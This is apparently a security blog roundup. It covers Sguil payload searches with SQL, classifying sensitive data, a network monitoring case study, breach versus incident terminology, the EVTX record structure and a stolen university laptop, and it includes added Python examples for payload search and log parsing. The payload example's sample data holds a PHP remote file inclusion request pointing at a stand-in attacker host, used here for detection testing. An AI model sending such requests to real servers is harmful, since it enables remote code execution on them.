Busy, busy, busy. If only I had more time during the day.
Here’s the list:
Searching inside payload data – Good little SQL statement to hang on to.
Almost all of my searches involve IPs and/or port numbers, and Sguil has a lot of built-in support for these types of database queries, making them very easy to deal with. Sometimes, though, you want to search on something a little more difficult.
This morning, for example, I had a specific URL that was used in some PHP injection attack attempts, and I wanted to find only those alerts that had that URL as part of their data payload.
Constructing a query for this is actually pretty easy, if you use the HEX() and the CONCAT() SQL functions. If you’re using the GUI interface, you only have to construct the WHERE clause, so you can do something like the following…
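As an added example (not from the original post, and not Sguil's own code), the script below builds the WHERE clause the post describes, HEX() wrapped in CONCAT(), and then checks what that clause actually matches against an in-memory SQLite copy of a Sguil-style payload table. It assumes Sguil stores the packet payload as an uppercase hex string in `data.data_payload` (the table and column names are assumptions; check your own schema); CONCAT() and LOCATE() are MySQL functions, so they are emulated for SQLite. It also shows a caveat the post does not mention: a LIKE over a hex string can match starting at an odd nibble, between two bytes, and the stricter clause rejects those hits.

```python
"""Added example (not from the original post, and not Sguil's own code).

Builds the WHERE clause the post describes (HEX() inside CONCAT()) for
searching Sguil's payload table, and checks what that clause matches against
an in-memory SQLite copy of a Sguil-style table.  Assumptions: Sguil stores
the packet payload as an uppercase hex string in data.data_payload (table and
column names are assumptions; check your own schema).  CONCAT() and LOCATE()
are MySQL functions, so they are emulated for SQLite below.
"""
import sqlite3


def payload_where_clause(needle: str) -> str:
    """WHERE clause for the Sguil GUI query builder.

    HEX() is applied to the literal by the database, so '%' and '_' in the
    needle are hex-encoded before LIKE sees them and match literally; only
    the single quote needs escaping.
    """
    escaped = needle.replace("'", "''")
    return f"data.data_payload LIKE CONCAT('%', HEX('{escaped}'), '%')"


def strict_where_clause(needle: str) -> str:
    """Same search, but only byte-aligned hits.

    A LIKE over a hex string can also match starting at an odd nibble, i.e.
    straddling two bytes, which is a false positive.  LOCATE() is 1-based,
    so a byte-aligned match starts at an odd position.
    """
    escaped = needle.replace("'", "''")
    return (f"LOCATE(HEX('{escaped}'), data.data_payload) > 0 "
            f"AND LOCATE(HEX('{escaped}'), data.data_payload) % 2 = 1")


def build_sample_db() -> sqlite3.Connection:
    """Constructed Sguil-style rows (not real traffic): (sid, cid, payload)."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("CONCAT", -1, lambda *parts: "".join(parts))
    conn.create_function("LOCATE", 2, lambda sub, s: s.find(sub) + 1)
    conn.execute("CREATE TABLE data (sid INTEGER, cid INTEGER, data_payload TEXT)")
    samples = [
        (1, 100, b"GET /index.php?page=http://evil.example/inject.txt? HTTP/1.1"),
        (1, 101, b"GET /index.php HTTP/1.1"),
        # Constructed: the needle's hex shifted by one nibble, so the hex
        # string contains HEX('inject.txt') but no byte sequence does.
        (1, 102, bytes.fromhex("0" + b"inject.txt".hex() + "0")),
    ]
    conn.executemany(
        "INSERT INTO data VALUES (?, ?, ?)",
        [(sid, cid, payload.hex().upper()) for sid, cid, payload in samples],
    )
    return conn


def search_payload(conn: sqlite3.Connection, needle: str, strict: bool = False) -> list:
    """Run the search and return the matching cids in order."""
    where = strict_where_clause(needle) if strict else payload_where_clause(needle)
    rows = conn.execute(f"SELECT cid FROM data WHERE {where} ORDER BY cid").fetchall()
    return [cid for (cid,) in rows]


if __name__ == "__main__":
    db = build_sample_db()
    print(payload_where_clause("inject.txt"))
    print("LIKE  :", search_payload(db, "inject.txt"))        # [100, 102]
    print("strict:", search_payload(db, "inject.txt", True))  # [100]
```

In the GUI you paste only the string `payload_where_clause()` returns; the full query form is what you would run from the mysql client with a time window on `event.timestamp` so the LIKE does not scan the whole table. Whether the LIKE is case-sensitive depends on the column's collation, so if your payload column is binary, make sure the case HEX() produces matches what the sensor stored.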
Explaining Sensitive Information – Unfortunately there is no definitive method for classifying sensitive information. Which begs the question…shouldn’t there be?
Classification of data starts with defining that data. Unfortunately there are many definitions for personal or private information and these definitions are often different depending on country, state, organization, regulation, and other factors.
Network Security Monitoring Case Study – I love case studies!
So this is the major question. How do you convince management or other functional areas that monitoring is important? It sounds to me like my friend has already scored some wins by freeing bandwidth used by misconfigured systems, simplifying firewall rules, and examining individual problematic hosts.
It’s important to remember that there is no return on security investment. Security is a cost center that exists to prevent or reduce loss. It is not financially correct to believe you are “earning” a “return” by spending time and money to avoid a loss.
If I need to spend $1000 to hire a guard to protect my $10000 taxi, I am not earning a return on my investment — I am preventing the theft of my taxi. If I invest that $1000 in a ticketing and GPS system that makes me more productive ferrying passengers (perhaps increasing my dollars per hour worked), then I have enjoyed a ROI once my $1000 expense is covered.
Breach vs. Incident: Semantics or Something More? – Personally, I tend to think that a “breach” is an intrusion outside of policy whereas an “incident” would be the proceeding results of the aforementioned breach (attack a server, obtain sensitive documents, etc.).
What I find so fascinating about this statement is the distinction between incident and breach, and that an “incident” should not be viewed in the same light as a “breach”. So I started thinking, is this distinction merely a semantic issue, or are there some underlying assumptions amongst the general public that an incident is an everyday, and perhaps less dangerous, occurrence than a breach? One of the words is a simple noun that brings to mind a singular event of some type that may or may not be harmful. The other word is more action oriented and brings to mind, at least to my mind, images of whales bursting through the surface of the water and other dynamic events. Given the very differences in these words, should they be used as interchangeably as they are in the Information Security arena?
Evtx Event Record – Interesting.
This article documents the structure of a single event record within a Vista Event Log (.evtx) file.
The event record starts with a magic string, two asterisks followed by two null bytes. It is framed by matching length indications. They state the whole record’s size, from the magic string to the trailing length indicator. This is similar to the record structure of the old NT event logging service. The length indications at the beginning and at the end of an event record allow the logging service to traverse the chain of records efficiently in both directions.
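The following is an added example, not code from the article: a minimal walker for the record framing described above. It packs constructed records with the magic string, a leading size, and a trailing copy of the size, then traverses them forwards (following the leading sizes) and backwards (following the trailing copies), refusing any record whose two length fields disagree or do not fit the buffer. The record identifier and FILETIME fields between the size and the BinXML body are the public EVTX record layout; the sample bodies are opaque placeholders, and the walker assumes records sit back to back, so it does not handle the padding a real chunk has after its last record.

```python
"""Added example, not code from the original article: a minimal walker for
the EVTX event-record framing the article describes.  Layout assumed here
(the public EVTX record layout): 4-byte magic '**\\x00\\x00', 4-byte
little-endian size of the whole record (magic through the trailing size
copy), 8-byte record identifier, 8-byte FILETIME, the BinXML body, and a
4-byte copy of the size at the end.  The sample records are constructed,
not taken from a real log, and the BinXML bodies are opaque placeholders.
"""
import struct
from dataclasses import dataclass

MAGIC = b"**\x00\x00"
HEADER = struct.Struct("<4sIQQ")   # magic, size, record id, FILETIME
TRAILER = struct.Struct("<I")      # trailing copy of size
MIN_SIZE = HEADER.size + TRAILER.size


@dataclass
class EventRecord:
    offset: int
    size: int
    record_id: int
    filetime: int
    body: bytes


def build_record(record_id: int, filetime: int, body: bytes) -> bytes:
    """Frame a body the way the article describes: size at both ends."""
    size = MIN_SIZE + len(body)
    return HEADER.pack(MAGIC, size, record_id, filetime) + body + TRAILER.pack(size)


def parse_record(buf: bytes, offset: int) -> EventRecord:
    """Parse one record, refusing anything whose framing is inconsistent."""
    if offset + HEADER.size > len(buf):
        raise ValueError(f"truncated header at offset {offset}")
    magic, size, record_id, filetime = HEADER.unpack_from(buf, offset)
    if magic != MAGIC:
        raise ValueError(f"bad magic {magic!r} at offset {offset}")
    if size < MIN_SIZE or offset + size > len(buf):
        raise ValueError(f"size {size} at offset {offset} does not fit the buffer")
    (size_copy,) = TRAILER.unpack_from(buf, offset + size - TRAILER.size)
    if size_copy != size:
        raise ValueError(f"leading size {size} != trailing size {size_copy} at offset {offset}")
    body = buf[offset + HEADER.size : offset + size - TRAILER.size]
    return EventRecord(offset, size, record_id, filetime, body)


def walk_forward(buf: bytes) -> list:
    """Follow the leading size fields from the first record to the last."""
    records, offset = [], 0
    while offset < len(buf):
        rec = parse_record(buf, offset)
        records.append(rec)
        offset += rec.size
    return records


def walk_backward(buf: bytes) -> list:
    """Follow the trailing size copies from the last record to the first."""
    records, end = [], len(buf)
    while end > 0:
        if end < TRAILER.size:
            raise ValueError("truncated trailer")
        (size,) = TRAILER.unpack_from(buf, end - TRAILER.size)
        if size < MIN_SIZE or size > end:
            raise ValueError(f"bad trailing size {size} before offset {end}")
        rec = parse_record(buf, end - size)   # re-checks magic and leading size
        records.append(rec)
        end -= size
    return records


def is_well_framed(buf: bytes) -> bool:
    """True if forward and backward traversal agree on every record."""
    try:
        return walk_forward(buf) == list(reversed(walk_backward(buf)))
    except ValueError:
        return False


# Constructed sample: three records back to back, as within one chunk.
SAMPLE = b"".join([
    build_record(1, 0x01C8A00000000000, b"<binxml record 1>"),
    build_record(2, 0x01C8A00000000100, b"<binxml record 2, longer body>"),
    build_record(3, 0x01C8A00000000200, b""),
])

if __name__ == "__main__":
    for rec in walk_forward(SAMPLE):
        print(f"offset={rec.offset:4d} size={rec.size:3d} id={rec.record_id} body={rec.body!r}")
    print("well framed:", is_well_framed(SAMPLE))
```

The double length field is what makes this cheap to check during forensic carving: a record whose leading and trailing sizes disagree has been overwritten or truncated, and the backward walk from the end of a chunk lets you reach the newest records without parsing every BinXML body on the way.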
The University of Minnesota is alerting students after a laptop containing student grade information was stolen from a professor’s car during a trip to Palo Alto. The laptop, belonging to Elizabeth Beaumont of the political science department, contained the names, e-mail addresses, internal University IDs and grades for students enrolled in Beaumont’s classes from fall 2005 until present. While the University has a policy that all non-public information must be encrypted, 70-80% of the political science laptops, including Beaumont’s, have no encryption. The University has plans in place to ensure all political science laptops are encrypted by the end of the summer.